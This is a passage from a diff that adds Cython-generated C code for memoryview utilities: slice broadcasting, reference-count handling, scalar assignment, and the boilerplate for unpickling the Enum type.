+ * free(tmpdata) + * return 0 # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_broadcast_leading') + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":1265 + * + * @cname('__pyx_memoryview_copy_contents') + * cdef int memoryview_copy_contents(__Pyx_memviewslice src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice dst, + * int src_ndim, int dst_ndim, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.memoryview_copy_contents", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1337 + * + * @cname('__pyx_memoryview_broadcast_leading') + * cdef void broadcast_leading(__Pyx_memviewslice *mslice, # <<<<<<<<<<<<<< + * int ndim, + * int ndim_other) noexcept nogil: + */ + +static void __pyx_memoryview_broadcast_leading(__Pyx_memviewslice *__pyx_v_mslice, int __pyx_v_ndim, int __pyx_v_ndim_other) { + int __pyx_v_i; + int __pyx_v_offset; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + + /* "View.MemoryView":1341 + * int ndim_other) noexcept nogil: + * cdef int i + * cdef int offset = ndim_other - ndim # <<<<<<<<<<<<<< + * + * for i in range(ndim - 1, -1, -1): + */ + __pyx_v_offset = (__pyx_v_ndim_other - __pyx_v_ndim); + + /* "View.MemoryView":1343 + * cdef int offset = ndim_other - ndim + * + * for i in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] + */ + for (__pyx_t_1 = (__pyx_v_ndim - 1); __pyx_t_1 > -1; __pyx_t_1-=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":1344 + * + * for i in range(ndim - 1, -1, -1): + * mslice.shape[i + offset] = mslice.shape[i] # <<<<<<<<<<<<<< + * mslice.strides[i + offset] = mslice.strides[i] + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + */ + (__pyx_v_mslice->shape[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->shape[__pyx_v_i]); + + /* "View.MemoryView":1345 + * for i in range(ndim - 1, -1, -1): + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] # <<<<<<<<<<<<<< + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + * + */ + (__pyx_v_mslice->strides[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1346 + * mslice.shape[i + offset] = mslice.shape[i] + * mslice.strides[i + offset] = mslice.strides[i] + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] # <<<<<<<<<<<<<< + * + * for i in range(offset): + */ + (__pyx_v_mslice->suboffsets[(__pyx_v_i + __pyx_v_offset)]) = (__pyx_v_mslice->suboffsets[__pyx_v_i]); + } + + /* "View.MemoryView":1348 + * mslice.suboffsets[i + offset] = mslice.suboffsets[i] + * + * for i in range(offset): # <<<<<<<<<<<<<< + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] + */ + __pyx_t_1 = __pyx_v_offset; + __pyx_t_2 = __pyx_t_1; + for (__pyx_t_3 = 0; __pyx_t_3 < __pyx_t_2; __pyx_t_3+=1) { + __pyx_v_i = __pyx_t_3; + + /* "View.MemoryView":1349 + * + * for i in range(offset): + * mslice.shape[i] = 1 # <<<<<<<<<<<<<< + * mslice.strides[i] = mslice.strides[0] + * mslice.suboffsets[i] = -1 + */ + (__pyx_v_mslice->shape[__pyx_v_i]) = 1; + + /* "View.MemoryView":1350 + * for i in range(offset): + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] # <<<<<<<<<<<<<< + * mslice.suboffsets[i] = -1 + * + */ + (__pyx_v_mslice->strides[__pyx_v_i]) = (__pyx_v_mslice->strides[0]); + + /* "View.MemoryView":1351 + * mslice.shape[i] = 1 + * mslice.strides[i] = mslice.strides[0] + * mslice.suboffsets[i] = -1 # <<<<<<<<<<<<<< + * + * + */ + (__pyx_v_mslice->suboffsets[__pyx_v_i]) = -1L; + } + + /* "View.MemoryView":1337 + * + * @cname('__pyx_memoryview_broadcast_leading') + * cdef void broadcast_leading(__Pyx_memviewslice *mslice, # <<<<<<<<<<<<<< + * int ndim, + * int ndim_other) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1359 + * + * @cname('__pyx_memoryview_refcount_copying') + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: # <<<<<<<<<<<<<< + * + * if dtype_is_object: + */ + +static void __pyx_memoryview_refcount_copying(__Pyx_memviewslice *__pyx_v_dst, int __pyx_v_dtype_is_object, int __pyx_v_ndim, int __pyx_v_inc) { + + /* "View.MemoryView":1361 + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: + * + * if dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) + * + */ + if (__pyx_v_dtype_is_object) { + + /* "View.MemoryView":1362 + * + * if dtype_is_object: + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + */ + __pyx_memoryview_refcount_objects_in_slice_with_gil(__pyx_v_dst->data, __pyx_v_dst->shape, __pyx_v_dst->strides, __pyx_v_ndim, __pyx_v_inc); + + /* "View.MemoryView":1361 + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: + * + * if dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice_with_gil(dst.data, dst.shape, dst.strides, ndim, inc) + * + */ + } + + /* "View.MemoryView":1359 + * + * @cname('__pyx_memoryview_refcount_copying') + * cdef void refcount_copying(__Pyx_memviewslice *dst, bint dtype_is_object, int ndim, bint inc) noexcept nogil: # <<<<<<<<<<<<<< + * + * if dtype_is_object: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1365 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + * cdef void refcount_objects_in_slice_with_gil(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + */ + +static void __pyx_memoryview_refcount_objects_in_slice_with_gil(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, int __pyx_v_inc) { + __Pyx_RefNannyDeclarations + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("refcount_objects_in_slice_with_gil", 0); + + /* "View.MemoryView":1368 + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + * refcount_objects_in_slice(data, shape, strides, ndim, inc) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + */ + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_data, __pyx_v_shape, __pyx_v_strides, __pyx_v_ndim, __pyx_v_inc); + + /* "View.MemoryView":1365 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice_with_gil') + * cdef void refcount_objects_in_slice_with_gil(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * bint inc) noexcept with gil: + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif +} + +/* "View.MemoryView":1371 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + * cdef void refcount_objects_in_slice(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + */ + +static void __pyx_memoryview_refcount_objects_in_slice(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, int __pyx_v_inc) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + Py_ssize_t __pyx_v_stride; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + __Pyx_RefNannySetupContext("refcount_objects_in_slice", 0); + + /* "View.MemoryView":1374 + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] # <<<<<<<<<<<<<< + * + * for i in range(shape[0]): + */ + __pyx_v_stride = (__pyx_v_strides[0]); + + /* "View.MemoryView":1376 + * cdef Py_ssize_t stride = strides[0] + * + * for i in range(shape[0]): # <<<<<<<<<<<<<< + * if ndim == 1: + * if inc: + */ + __pyx_t_1 = (__pyx_v_shape[0]); + __pyx_t_2 = __pyx_t_1; + for (__pyx_t_3 = 0; __pyx_t_3 < __pyx_t_2; __pyx_t_3+=1) { + __pyx_v_i = __pyx_t_3; + + /* "View.MemoryView":1377 + * + * for i in range(shape[0]): + * if ndim == 1: # <<<<<<<<<<<<<< + * if inc: + * Py_INCREF(( data)[0]) + */ + __pyx_t_4 = (__pyx_v_ndim == 1); + if (__pyx_t_4) { + + /* "View.MemoryView":1378 + * for i in range(shape[0]): + * if ndim == 1: + * if inc: # <<<<<<<<<<<<<< + * Py_INCREF(( data)[0]) + * else: + */ + if (__pyx_v_inc) { + + /* "View.MemoryView":1379 + * if ndim == 1: + * if inc: + * Py_INCREF(( data)[0]) # <<<<<<<<<<<<<< + * else: + * Py_DECREF(( data)[0]) + */ + Py_INCREF((((PyObject **)__pyx_v_data)[0])); + + /* "View.MemoryView":1378 + * for i in range(shape[0]): + * if ndim == 1: + * if inc: # <<<<<<<<<<<<<< + * Py_INCREF(( data)[0]) + * else: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":1381 + * Py_INCREF(( data)[0]) + * else: + * Py_DECREF(( data)[0]) # <<<<<<<<<<<<<< + * else: + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) + */ + /*else*/ { + Py_DECREF((((PyObject **)__pyx_v_data)[0])); + } + __pyx_L6:; + + /* "View.MemoryView":1377 + * + * for i in range(shape[0]): + * if ndim == 1: # <<<<<<<<<<<<<< + * if inc: + * Py_INCREF(( data)[0]) + */ + goto __pyx_L5; + } + + /* "View.MemoryView":1383 + * Py_DECREF(( data)[0]) + * else: + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) # <<<<<<<<<<<<<< + * + * data += stride + */ + /*else*/ { + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_data, (__pyx_v_shape + 1), (__pyx_v_strides + 1), (__pyx_v_ndim - 1), __pyx_v_inc); + } + __pyx_L5:; + + /* "View.MemoryView":1385 + * refcount_objects_in_slice(data, shape + 1, strides + 1, ndim - 1, inc) + * + * data += stride # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + + /* "View.MemoryView":1371 + * + * @cname('__pyx_memoryview_refcount_objects_in_slice') + * cdef void refcount_objects_in_slice(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, bint inc) noexcept: + * cdef Py_ssize_t i + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":1391 + * + * @cname('__pyx_memoryview_slice_assign_scalar') + * cdef void slice_assign_scalar(__Pyx_memviewslice *dst, int ndim, # <<<<<<<<<<<<<< + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + */ + +static void __pyx_memoryview_slice_assign_scalar(__Pyx_memviewslice *__pyx_v_dst, int __pyx_v_ndim, size_t __pyx_v_itemsize, void *__pyx_v_item, int __pyx_v_dtype_is_object) { + + /* "View.MemoryView":1394 + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + * refcount_copying(dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) + * refcount_copying(dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying(__pyx_v_dst, __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1395 + * bint dtype_is_object) noexcept nogil: + * refcount_copying(dst, dtype_is_object, ndim, inc=False) + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) # <<<<<<<<<<<<<< + * refcount_copying(dst, dtype_is_object, ndim, inc=True) + * + */ + __pyx_memoryview__slice_assign_scalar(__pyx_v_dst->data, __pyx_v_dst->shape, __pyx_v_dst->strides, __pyx_v_ndim, __pyx_v_itemsize, __pyx_v_item); + + /* "View.MemoryView":1396 + * refcount_copying(dst, dtype_is_object, ndim, inc=False) + * _slice_assign_scalar(dst.data, dst.shape, dst.strides, ndim, itemsize, item) + * refcount_copying(dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * + * + */ + __pyx_memoryview_refcount_copying(__pyx_v_dst, __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1391 + * + * @cname('__pyx_memoryview_slice_assign_scalar') + * cdef void slice_assign_scalar(__Pyx_memviewslice *dst, int ndim, # <<<<<<<<<<<<<< + * size_t itemsize, void *item, + * bint dtype_is_object) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1400 + * + * @cname('__pyx_memoryview__slice_assign_scalar') + * cdef void _slice_assign_scalar(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * size_t itemsize, void *item) noexcept nogil: + */ + +static void __pyx_memoryview__slice_assign_scalar(char *__pyx_v_data, Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, int __pyx_v_ndim, size_t __pyx_v_itemsize, void *__pyx_v_item) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + Py_ssize_t __pyx_v_stride; + Py_ssize_t __pyx_v_extent; + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + + /* "View.MemoryView":1404 + * size_t itemsize, void *item) noexcept nogil: + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t extent = shape[0] + * + */ + __pyx_v_stride = (__pyx_v_strides[0]); + + /* "View.MemoryView":1405 + * cdef Py_ssize_t i + * cdef Py_ssize_t stride = strides[0] + * cdef Py_ssize_t extent = shape[0] # <<<<<<<<<<<<<< + * + * if ndim == 1: + */ + __pyx_v_extent = (__pyx_v_shape[0]); + + /* "View.MemoryView":1407 + * cdef Py_ssize_t extent = shape[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * for i in range(extent): + * memcpy(data, item, itemsize) + */ + __pyx_t_1 = (__pyx_v_ndim == 1); + if (__pyx_t_1) { + + /* "View.MemoryView":1408 + * + * if ndim == 1: + * for i in range(extent): # <<<<<<<<<<<<<< + * memcpy(data, item, itemsize) + * data += stride + */ + __pyx_t_2 = __pyx_v_extent; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1409 + * if ndim == 1: + * for i in range(extent): + * memcpy(data, item, itemsize) # <<<<<<<<<<<<<< + * data += stride + * else: + */ + (void)(memcpy(__pyx_v_data, __pyx_v_item, __pyx_v_itemsize)); + + /* "View.MemoryView":1410 + * for i in range(extent): + * memcpy(data, item, itemsize) + * data += stride # <<<<<<<<<<<<<< + * else: + * for i in range(extent): + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + + /* "View.MemoryView":1407 + * cdef Py_ssize_t extent = shape[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * for i in range(extent): + * memcpy(data, item, itemsize) + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1412 + * data += stride + * else: + * for i in range(extent): # <<<<<<<<<<<<<< + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) + * data += stride + */ + /*else*/ { + __pyx_t_2 = __pyx_v_extent; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1413 + * else: + * for i in range(extent): + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) # <<<<<<<<<<<<<< + * data += stride + * + */ + __pyx_memoryview__slice_assign_scalar(__pyx_v_data, (__pyx_v_shape + 1), (__pyx_v_strides + 1), (__pyx_v_ndim - 1), __pyx_v_itemsize, __pyx_v_item); + + /* "View.MemoryView":1414 + * for i in range(extent): + * _slice_assign_scalar(data, shape + 1, strides + 1, ndim - 1, itemsize, item) + * data += stride # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_data = (__pyx_v_data + __pyx_v_stride); + } + } + __pyx_L3:; + + /* "View.MemoryView":1400 + * + * @cname('__pyx_memoryview__slice_assign_scalar') + * cdef void _slice_assign_scalar(char *data, Py_ssize_t *shape, # <<<<<<<<<<<<<< + * Py_ssize_t *strides, int ndim, + * size_t itemsize, void *item) noexcept nogil: + */ + + /* function exit code */ +} + +/* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15View_dot_MemoryView_1__pyx_unpickle_Enum = {"__pyx_unpickle_Enum", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15View_dot_MemoryView_1__pyx_unpickle_Enum(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_type = 0; + long __pyx_v___pyx_checksum; + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_type,&__pyx_n_s_pyx_checksum,&__pyx_n_s_pyx_state,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_checksum)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, 1); __PYX_ERR(1, 1, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, 2); __PYX_ERR(1, 1, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__pyx_unpickle_Enum") < 0)) __PYX_ERR(1, 1, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v___pyx_type = values[0]; + __pyx_v___pyx_checksum = __Pyx_PyInt_As_long(values[1]); if (unlikely((__pyx_v___pyx_checksum == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_v___pyx_state = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, __pyx_nargs); __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(__pyx_self, __pyx_v___pyx_type, __pyx_v___pyx_checksum, __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_v___pyx_PickleError = 0; + PyObject *__pyx_v___pyx_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + __pyx_t_1 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_t_1, __pyx_tuple__8, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (__pyx_t_2) { + + /* "(tree fragment)":5 + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): + * from pickle import PickleError as __pyx_PickleError # <<<<<<<<<<<<<< + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + */ + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_s_PickleError); + __Pyx_GIVEREF(__pyx_n_s_PickleError); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_s_PickleError); + __pyx_t_3 = __Pyx_Import(__pyx_n_s_pickle, __pyx_t_1, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_PickleError); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_t_1); + __pyx_v___pyx_PickleError = __pyx_t_1; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":6 + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum # <<<<<<<<<<<<<< + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: + */ + __pyx_t_3 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_v___pyx_PickleError, __pyx_t_1, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(1, 6, __pyx_L1_error) + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + } + + /* "(tree fragment)":7 + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) # <<<<<<<<<<<<<< + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_MemviewEnum_type), __pyx_n_s_new); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v___pyx_type}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v___pyx_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + __pyx_t_2 = (__pyx_v___pyx_state != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":9 + * 